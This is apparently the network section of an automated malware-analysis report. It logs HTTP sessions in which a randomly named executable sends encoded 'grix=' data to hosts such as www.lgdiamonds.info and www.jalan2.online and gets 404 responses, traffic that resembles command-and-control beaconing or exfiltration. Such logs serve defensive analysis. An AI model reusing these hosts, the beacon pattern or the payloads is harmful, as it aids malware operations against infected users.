                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 67 72 69 78 3d 48 4b 35 36 44 30 5a 68 2f 66 2b 48 6b 45 2b 63 6c 75 53 2b 63 65 52 47 6c 6f 30 6c 34 57 4a 5a 61 59 55 53 6d 78 71 41 35 6e 74 67 30 30 7a 69 72 51 4d 53 63 34 75 76 43 5a 67 39 58 4a 66 2f 6f 66 36 35 58 4b 51 44 69 38 71 49 70 72 44 78 68 43 62 4e 6a 52 72 7a 61 4c 76 62 53 54 76 64 33 65 36 64 45 55 50 34 2b 51 2f 2f 75 53 4e 61 50 7a 77 41 2b 51 52 73 72 65 78 76 36 2b 48 4b 53 4f 65 48 37 62 59 4b 43 50 37 77 76 69 50 53 78 43 78 6d 30 2b 6b 2b 79 4f 50 75 52 5a 57 54 4a 36 79 78 64 61 79 45 72 62 2b 4f 6a 30 4d 31 79 59 49 79 78 4a 64 41 59 6f 66 44 31 36 6a 50 6f 31 7a 2f 61 4f 64 65 79 34 6f 58 38 48 70 33 35 6c 4d 6e 4c 35 2b 61 36 49 5a 56 55 62 65 70 77 77 3d 3d
                                                      Data Ascii: grix=HK56D0Zh/f+HkE+cluS+ceRGlo0l4WJZaYUSmxqA5ntg00zirQMSc4uvCZg9XJf/of65XKQDi8qIprDxhCbNjRrzaLvbSTvd3e6dEUP4+Q//uSNaPzwA+QRsrexv6+HKSOeH7bYKCP7wviPSxCxm0+k+yOPuRZWTJ6yxdayErb+Oj0M1yYIyxJdAYofD16jPo1z/aOdey4oX8Hp35lMnL5+a6IZVUbepww==
                                                      Jan 10, 2025 21:47:44.325855970 CET322INHTTP/1.1 404 Not Found
                                                      Server: nginx/1.6.2
                                                      Date: Fri, 10 Jan 2025 20:47:44 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.649998130.185.109.77803524C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 21:47:46.263134003 CET1785OUTPOST /cv1w/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 1245
                                                      Host: www.lgdiamonds.info
                                                      Origin: http://www.lgdiamonds.info
                                                      Referer: http://www.lgdiamonds.info/cv1w/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 67 72 69 78 3d 48 4b 35 36 44 30 5a 68 2f 66 2b 48 6b 45 2b 63 6c 75 53 2b 63 65 52 47 6c 6f 30 6c 34 57 4a 5a 61 59 55 53 6d 78 71 41 35 6d 56 67 30 6d 4c 69 71 78 4d 53 64 34 75 76 42 5a 68 61 58 4a 65 6e 6f 66 53 39 58 4b 56 34 69 2b 69 49 6d 75 58 78 6f 51 7a 4e 74 52 72 7a 54 72 76 50 57 54 76 49 33 65 71 5a 45 55 66 34 2b 51 2f 2f 75 52 56 61 59 79 77 41 74 67 52 6a 6a 2b 78 64 77 75 48 69 53 4b 7a 6c 37 62 4d 67 43 38 7a 77 75 43 66 53 69 41 70 6d 32 65 6b 38 78 4f 50 6d 52 5a 4b 41 4a 2b 53 4c 64 66 6d 2b 72 63 4f 4f 68 44 35 57 6f 72 31 75 6e 61 68 6a 45 66 6e 47 74 50 54 6f 77 46 79 41 52 74 68 4f 7a 34 34 37 77 67 56 76 39 30 35 5a 43 49 43 78 77 2b 49 6c 65 62 7a 6c 73 30 75 4b 70 4a 55 2f 44 45 75 68 4d 73 55 36 63 37 53 43 78 33 59 51 68 56 4b 51 6a 41 38 48 48 39 5a 65 73 2b 74 30 75 34 35 35 55 75 48 47 75 58 66 35 59 2b 50 48 67 49 50 67 6a 54 46 6e 4e 42 42 45 59 62 2f 52 78 6e 62 6f 59 55 37 63 2f 62 36 44 78 54 79 73 78 4c 50 57 34 49 75 45 6c 48 35 4d 45 35 6a 6b 7a 30 39 48 64 [TRUNCATED]
                                                      Data Ascii: grix=HK56D0Zh/f+HkE+cluS+ceRGlo0l4WJZaYUSmxqA5mVg0mLiqxMSd4uvBZhaXJenofS9XKV4i+iImuXxoQzNtRrzTrvPWTvI3eqZEUf4+Q//uRVaYywAtgRjj+xdwuHiSKzl7bMgC8zwuCfSiApm2ek8xOPmRZKAJ+SLdfm+rcOOhD5Wor1unahjEfnGtPTowFyARthOz447wgVv905ZCICxw+Ilebzls0uKpJU/DEuhMsU6c7SCx3YQhVKQjA8HH9Zes+t0u455UuHGuXf5Y+PHgIPgjTFnNBBEYb/RxnboYU7c/b6DxTysxLPW4IuElH5ME5jkz09HdKLSqBZFXN7MUkEEkrGZCL+Lrm0Ui0dO71FdXawGQPSIxTbmsRAGMHmbmO4sbvIk/nONmSYkbj4559MZySWoEaWzfNoTTRFYY2KEiFH5y5KEU7GLmGpCLvisJrS2w4a93VZUPN7o0GAgVNYLm+2jlMFx9FkeBX6oD2VyO2GRcXfzOxVjWb+75rSAowtRne/emI43lE68t2I0AGJnC1ToIpfq1/qPJIUrW4h55gi0j4ebIPiZUfJ9gt0LsSHPWiTJBiYdG4TlW2cQ0Avbdr+JJfXf59QeyDPTSMqPbhyCK+JukmQCYULMqarb7Gddr84e7J+oVIZq5J+BLfmIIZkhSkS8IBizL6kp57W1+KRVcrft5ZrV2ddH5Jd4pekB87kSYwSA+C1t7rus0UwsrNGKC7LY3WawfOH5V4NInSUl67snegCvHw6YF8eES1BmWV0K5oI4odOx37cuJEItwmO42gYt9xpdTi6qm6wyrEe26u5wvKsgD5C3RunzIQ2QPrY+LXd5FkNVoTb9gdsp6sXDBQVOYQSZXEq9XZWYCw09T3BMreGjx/HoTG+oDjrRyXWwtczshLOlCt1ovAZyEFh3dUrQxP3tTwbA2m+B9Nx3oND79IV6Pi9P+zbpYDKxJIgcxVQueRWed0InEtxyiUxFvpYfFI7ELBSLcPi [TRUNCATED]
                                                      Jan 10, 2025 21:47:46.910240889 CET322INHTTP/1.1 404 Not Found
                                                      Server: nginx/1.6.2
                                                      Date: Fri, 10 Jan 2025 20:47:46 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.649999130.185.109.77803524C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 21:47:48.802963018 CET486OUTGET /cv1w/?grix=KIRaABhBgujzn3KWmND9cpAT+69hyUlHf/kT3kOA8kciiH38vV9KVMyDNvMwVI643JmGXckFkIiptpvhjjDetXnoSoSOcAqJ+evnJHX5lUu5kxQtYxAyoUFY891atvjjNtDr6f0=&jxk=HtO4sxDXWj2 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.lgdiamonds.info
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Jan 10, 2025 21:47:49.476176977 CET317INHTTP/1.1 404 Not Found
                                                      Server: nginx/1.6.2
                                                      Date: Fri, 10 Jan 2025 20:47:49 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 168
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.650000108.181.189.7803524C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 21:47:54.531306982 CET742OUTPOST /lvda/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 209
                                                      Host: www.jalan2.online
                                                      Origin: http://www.jalan2.online
                                                      Referer: http://www.jalan2.online/lvda/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 67 72 69 78 3d 4a 4a 72 79 55 68 4f 30 67 6d 71 6c 6e 2b 68 5a 78 4d 6a 2f 6c 42 38 48 6f 43 31 38 70 74 67 32 6d 61 52 6c 41 58 32 62 65 64 66 72 79 7a 4f 34 4d 67 7a 6c 6f 6b 58 47 2f 72 48 7a 6c 36 6f 53 32 50 78 77 77 54 39 73 66 51 4f 4d 44 66 54 4e 45 4b 75 72 70 4c 42 2f 42 73 45 31 58 48 58 6d 6f 2b 33 41 6e 54 68 44 41 75 59 6e 44 35 74 2b 31 41 72 72 59 52 6b 57 36 30 77 6b 41 44 62 72 52 55 46 66 4f 63 69 79 39 48 4c 77 35 59 52 62 6d 49 6d 5a 76 33 37 63 6e 39 52 76 6c 4a 68 6a 74 47 70 48 42 6b 6e 64 44 35 30 2f 46 64 44 34 54 43 34 47 76 67 73 79 74 2f 72 38 4d 79 37 4c 5a 58 4d 74 77 41 58 66 69 4a 79 33
                                                      Data Ascii: grix=JJryUhO0gmqln+hZxMj/lB8HoC18ptg2maRlAX2bedfryzO4MgzlokXG/rHzl6oS2PxwwT9sfQOMDfTNEKurpLB/BsE1XHXmo+3AnThDAuYnD5t+1ArrYRkW60wkADbrRUFfOciy9HLw5YRbmImZv37cn9RvlJhjtGpHBkndD50/FdD4TC4Gvgsyt/r8My7LZXMtwAXfiJy3
                                                      Jan 10, 2025 21:47:55.120342016 CET987INHTTP/1.1 404 Not Found
                                                      content-type: text/html
                                                      cache-control: private, no-cache, max-age=0
                                                      pragma: no-cache
                                                      date: Fri, 10 Jan 2025 20:47:55 GMT
                                                      server: LiteSpeed
                                                      content-encoding: gzip
                                                      vary: Accept-Encoding
                                                      transfer-encoding: chunked
                                                      connection: close
                                                      Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e a7 70 31 12 28 97 c2 67 49 1c bf 1d 85 5f c8 38 7d 5a f4 0c 34 6b 29 60 2d 71 d3 19 eb 47 50 1b ed 51 fb c5 68 23 b9 17 0b 8e 6b 59 63 d4 0f c6 20 b5 f4 92 a9 c8 d5 8c 60 93 31 38 61 a5 be 8f bc 89 1a e9 17 da 04 74 2f bd c2 12 d2 38 85 9f c6 c3 57 b3 d2 fc cd 59 31 1d e6 8b 9e 52 f9 a1 45 2e 19 5c 76 16 1b b4 2e aa 8d 32 96 70 05 b6 98 71 66 ef af 1e 2a c3 77 0f 15 ab ef 97 36 40 0c 21 d9 45 1c c7 e7 b2 0d 64 99 f6 8f 8f c5 74 00 2c a6 fb ac c2 b2 43 de c3 12 b8 48 d3 34 87 96 d9 a5 d4 59 9c 37 94 62 06 da d8 96 29 48 d2 6e 3b 9d c5 dd 16 3e 5a 4a 6d 0c df 50 ad d1 cb 9a 51 76 4c bb c8 a1 95 4d 0e 27 12 e6 f0 8a 15 5c 34 4d 93 87 ec b9 5c bf 50 9d ad bc a1 dd a5 8e 9e 61 8c 4a 08 cf e9 02 8f 5b 1f 31 25 97 3a 83 [TRUNCATED]
                                                      Data Ascii: a2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4Y7b)Hn;>ZJmPQvLM'\4M\PaJ[1%:L@C|>&"%dgbt*gct\]9B$@%rfUR0l(N2)= lMh<*Y:tyT+,ZF9F{^L;}"h8gY>q.2hkk^O$NhuB+c9>(:.+v6IW`l2xcxz+:}_-ohWvT$dm47/kDa-4_Jt] %6$YvLi>Fj3bC{.~p/+a
                                                      Jan 10, 2025 21:47:55.123480082 CET5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.650001108.181.189.7803524C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 21:47:57.076729059 CET766OUTPOST /lvda/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 233
                                                      Host: www.jalan2.online
                                                      Origin: http://www.jalan2.online
                                                      Referer: http://www.jalan2.online/lvda/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 67 72 69 78 3d 4a 4a 72 79 55 68 4f 30 67 6d 71 6c 32 74 70 5a 33 76 4c 2f 30 78 38 45 32 53 31 38 38 39 68 2f 6d 61 64 6c 41 57 43 4c 65 76 72 72 7a 53 2b 34 4e 6a 72 6c 39 6b 58 47 33 4c 48 32 68 36 6f 4e 32 50 39 65 77 53 42 73 66 51 61 4d 44 66 6a 4e 45 39 79 73 76 62 42 48 4a 4d 45 37 54 48 58 6d 6f 2b 33 41 6e 54 30 6d 41 76 77 6e 44 49 64 2b 31 68 72 73 47 42 6b 52 79 55 77 6b 4b 6a 62 76 52 55 46 68 4f 59 72 6c 39 45 7a 77 35 59 42 62 6d 63 79 61 67 33 37 67 6a 39 52 6b 74 4c 49 53 72 33 6f 6b 4a 33 4c 62 65 4c 49 33 45 72 65 69 50 78 34 6c 39 77 4d 77 74 39 7a 4f 4d 53 37 68 62 58 30 74 69 58 62 34 74 39 58 55 70 78 42 4a 72 62 5a 54 4e 4c 58 36 6e 45 69 79 47 49 4f 6c 6d 77 3d 3d
                                                      Data Ascii: grix=JJryUhO0gmql2tpZ3vL/0x8E2S1889h/madlAWCLevrrzS+4Njrl9kXG3LH2h6oN2P9ewSBsfQaMDfjNE9ysvbBHJME7THXmo+3AnT0mAvwnDId+1hrsGBkRyUwkKjbvRUFhOYrl9Ezw5YBbmcyag37gj9RktLISr3okJ3LbeLI3EreiPx4l9wMwt9zOMS7hbX0tiXb4t9XUpxBJrbZTNLX6nEiyGIOlmw==
                                                      Jan 10, 2025 21:47:57.636166096 CET987INHTTP/1.1 404 Not Found
                                                      content-type: text/html
                                                      cache-control: private, no-cache, max-age=0
                                                      pragma: no-cache
                                                      date: Fri, 10 Jan 2025 20:47:57 GMT
                                                      server: LiteSpeed
                                                      content-encoding: gzip
                                                      vary: Accept-Encoding
                                                      transfer-encoding: chunked
                                                      connection: close
                                                      Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e a7 70 31 12 28 97 c2 67 49 1c bf 1d 85 5f c8 38 7d 5a f4 0c 34 6b 29 60 2d 71 d3 19 eb 47 50 1b ed 51 fb c5 68 23 b9 17 0b 8e 6b 59 63 d4 0f c6 20 b5 f4 92 a9 c8 d5 8c 60 93 31 38 61 a5 be 8f bc 89 1a e9 17 da 04 74 2f bd c2 12 d2 38 85 9f c6 c3 57 b3 d2 fc cd 59 31 1d e6 8b 9e 52 f9 a1 45 2e 19 5c 76 16 1b b4 2e aa 8d 32 96 70 05 b6 98 71 66 ef af 1e 2a c3 77 0f 15 ab ef 97 36 40 0c 21 d9 45 1c c7 e7 b2 0d 64 99 f6 8f 8f c5 74 00 2c a6 fb ac c2 b2 43 de c3 12 b8 48 d3 34 87 96 d9 a5 d4 59 9c 37 94 62 06 da d8 96 29 48 d2 6e 3b 9d c5 dd 16 3e 5a 4a 6d 0c df 50 ad d1 cb 9a 51 76 4c bb c8 a1 95 4d 0e 27 12 e6 f0 8a 15 5c 34 4d 93 87 ec b9 5c bf 50 9d ad bc a1 dd a5 8e 9e 61 8c 4a 08 cf e9 02 8f 5b 1f 31 25 97 3a 83 [TRUNCATED]
                                                      Data Ascii: a2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4Y7b)Hn;>ZJmPQvLM'\4M\PaJ[1%:L@C|>&"%dgbt*gct\]9B$@%rfUR0l(N2)= lMh<*Y:tyT+,ZF9F{^L;}"h8gY>q.2hkk^O$NhuB+c9>(:.+v6IW`l2xcxz+:}_-ohWvT$dm47/kDa-4_Jt] %6$YvLi>Fj3bC{.~p/+a
                                                      Jan 10, 2025 21:47:57.636430025 CET5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.650002108.181.189.7803524C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 21:47:59.623163939 CET1779OUTPOST /lvda/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 1245
                                                      Host: www.jalan2.online
                                                      Origin: http://www.jalan2.online
                                                      Referer: http://www.jalan2.online/lvda/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 67 72 69 78 3d 4a 4a 72 79 55 68 4f 30 67 6d 71 6c 32 74 70 5a 33 76 4c 2f 30 78 38 45 32 53 31 38 38 39 68 2f 6d 61 64 6c 41 57 43 4c 65 76 54 72 7a 6b 43 34 4d 43 72 6c 76 55 58 47 39 72 48 33 68 36 6f 45 32 50 56 53 77 53 4e 57 66 53 69 4d 52 73 62 4e 47 50 61 73 6d 62 42 48 4c 4d 45 36 58 48 57 38 6f 2b 6e 4d 6e 51 4d 6d 41 76 77 6e 44 4c 31 2b 38 51 72 73 45 42 6b 57 36 30 77 67 41 44 62 4c 52 55 4d 61 4f 59 75 59 68 6c 54 77 36 38 64 62 6b 70 6d 61 70 33 37 59 6b 39 51 6b 74 4c 55 4a 72 33 30 43 4a 32 2f 78 65 4c 38 33 47 2f 7a 49 55 41 49 73 72 7a 4d 57 74 63 44 7a 4d 43 6e 66 55 57 59 78 73 68 58 74 6a 4a 65 32 73 78 63 53 74 72 73 6f 59 64 76 42 34 42 43 6a 41 4d 6d 67 39 67 43 47 59 76 62 66 32 4d 6e 78 59 4b 2b 72 4a 74 70 61 6e 71 6b 6c 47 45 32 33 77 58 50 70 50 57 53 56 4f 4d 33 52 33 72 50 4c 34 41 59 54 6b 43 65 5a 6b 44 4f 53 6b 50 33 41 57 67 41 44 70 64 65 74 6b 30 48 79 51 49 75 68 71 51 70 74 41 61 70 57 34 74 36 2b 73 7a 31 74 53 58 50 66 32 41 34 66 6d 6e 78 6b 4e 4e 76 48 37 [TRUNCATED]
                                                      Data Ascii: grix=JJryUhO0gmql2tpZ3vL/0x8E2S1889h/madlAWCLevTrzkC4MCrlvUXG9rH3h6oE2PVSwSNWfSiMRsbNGPasmbBHLME6XHW8o+nMnQMmAvwnDL1+8QrsEBkW60wgADbLRUMaOYuYhlTw68dbkpmap37Yk9QktLUJr30CJ2/xeL83G/zIUAIsrzMWtcDzMCnfUWYxshXtjJe2sxcStrsoYdvB4BCjAMmg9gCGYvbf2MnxYK+rJtpanqklGE23wXPpPWSVOM3R3rPL4AYTkCeZkDOSkP3AWgADpdetk0HyQIuhqQptAapW4t6+sz1tSXPf2A4fmnxkNNvH7LEnunEI7lCvzHx7jK1dVBCKOomYLFJrKOTLgoEmJes6WJChsMDDSdaNK/a/igBmy9QbUuRhnUF/598ACEp+QMUCBAump+O/OelcrnF3AaSkYh5tmWQpVCeCYBEQ5q3KrPiRXJMA9DSB6+mI4v51zG2p18ek/iN2SbzyTRontQib2GDEYi4/t/xNVe+2OGE1/QUGZEP0XGNkfV9QANb+D+xIszzy+QrJd5xic86wYuqtxw6L2nDc99OHDibrTXXTI2onz/lInZRcQ3dwuacZAqcUgfuffvd70OYv88NZbU7a//OZT2RtgRz8F3k18Y7ovf11WVf/ss+pz2kNzcTPAcH/TGtY2Z9kTRgJVW6zDxN1cvGutjKKyU+booaEwJo1fjcoYqCkTIezbFsqMpLpLnx4rXjG6RsTBHaL3VhHWZZyQ3a65jk6pPP5k1DSb5/+jKmAY46SkCJN2fNpde11jxvipzwyMZDwuskP7O0oxcQkFLllVS5CvbJpzmzTS6jinhEbN2A/jTfGPLafXFR/fasZxkoiuo2GN7JkyXOSeKsQOp1yKoGgPGAR9h58VnBYr1II9DAuO7X7L4MOhwduE6/GILrvY8QIZEJ9ymqq3Wm4m7knDxIhIButqX/nPQKKO5DBfYksX5QcZCvAVRt3f9B2Ce1hp7ZglQn [TRUNCATED]
                                                      Jan 10, 2025 21:48:00.159053087 CET279INHTTP/1.1 404 Not Found
                                                      content-type: text/html
                                                      cache-control: private, no-cache, max-age=0
                                                      pragma: no-cache
                                                      date: Fri, 10 Jan 2025 20:48:00 GMT
                                                      server: LiteSpeed
                                                      content-encoding: gzip
                                                      vary: Accept-Encoding
                                                      transfer-encoding: chunked
                                                      connection: close
                                                      Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a
                                                      Data Ascii: a
                                                      Jan 10, 2025 21:48:00.160706997 CET713INData Raw: 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e
                                                      Data Ascii: 2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16192.168.2.650003108.181.189.780
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 21:48:02.960645914 CET484OUTGET /lvda/?grix=ELDSXX2RsHX+gMhDzPeoz2Qv1CIr49o7uMJ0P3epR9C3wBGcH3Oc/iCy84j3rr0M4JJUpyIPXVKNA8OpCuWYnK4KGJgudRTv/NyY6RpnXIZyD5kBpznzTkEusFk7ThvsJGVoHcI=&jxk=HtO4sxDXWj2 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.jalan2.online
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Jan 10, 2025 21:48:03.513480902 CET1236INHTTP/1.1 404 Not Found
                                                      content-type: text/html
                                                      cache-control: private, no-cache, max-age=0
                                                      pragma: no-cache
                                                      content-length: 1249
                                                      date: Fri, 10 Jan 2025 20:48:03 GMT
                                                      server: LiteSpeed
                                                      connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 